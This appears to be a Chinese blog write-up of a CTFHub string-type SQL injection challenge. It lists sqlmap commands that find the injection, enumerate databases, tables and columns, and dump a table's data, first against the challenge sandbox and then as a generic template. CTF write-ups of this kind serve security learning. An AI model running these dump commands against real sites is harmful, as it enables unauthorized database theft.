当前位置: 首页 > news >正文

CTFHUB-SQL注入-字符型注入

news 2025/7/21 11:08:48

目录

查询数据库名

查询数据库中的表名

查询表中数据

总结

此题目和上一题相似,一个是整数型注入,一个是字符型注入。字符型注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成

查询数据库名

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" --current-db

查询数据库中的表名

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

查询表中数据

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

得到了flag

总结

判断是否存在注入

python sqlmap.py -u "http://xxx/?id=1"

查看当前数据库名称

python sqlmap.py -u "http://xxx/?id=1" --current-db

查看当前数据库的表

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 --tables

查看表中的字段名

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --columns

查看表中的数据

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --dump
http://www.lryc.cn/news/367476.html

相关文章:

  • Docker配置Redis集群以及主从扩容与缩容
  • 【计算机网络】 传输层
  • 山东大学软件学院项目实训-创新实训-基于大模型的旅游平台(二十七)- 微服务(7)
  • Java Web应用,IPv6问题解决
  • MyBatis二级缓存开启条件
  • golang 不用sleep如何实现实现每隔指定时间执行一次for循环?
  • 【el-tooltips改造】Vue实现文本溢出才显示el-tooltip,否则不显示el-tooltips
  • 【Python数据类型的奥秘】:构建程序基石,驾驭信息之海
  • vue使用html2canvas截图下载时,存在svg或者img或者特殊字体时截图不全的解决办法
  • 机器学习----奥卡姆剃刀定律
  • 【设计模式】行为型设计模式之 模板方法模式
  • 智能合约中断言失败
  • flink读取hive写入http接口
  • 【论文阅读】MODELING AND SOLVING THE TRAVELING SALESMAN PROBLEM WITH PRIORITY PRIZES
  • 【CS.SE】使用 docker pull confluentinc/cp-kafka 的全面指南
  • STM32快速入门(ADC数模转换)
  • Linux环境在非root用户中搭建(java-tomcat-redis)
  • Unity 之 代码修改材质球贴图
  • spark-3.5.1+Hadoop 3.4.0+Hive4.0 分布式集群 安装配置
  • Matlab实现GWO-CNN-LSTM-Mutilhead-Att灰狼算法卷积长短期记忆神经网络融合多头注意力机制预测 SCI顶级优化
  • RTKLIB之RTKPLOT画图工具
  • 本地部署 RAGFlow
  • php常用数据库操作
  • 判断经纬度是否在某个城市内
  • Java——数组排序和查找
  • Flutter中防抖动和节流策略
  • 设计模式-中介者(调停者)模式(行为型)
  • HC-05蓝牙模块配置连接和使用
  • 云上小知识:企业选择云服务的小Tips
  • 生成式人工智能 - Stable Diffusion 都使用了哪些技术?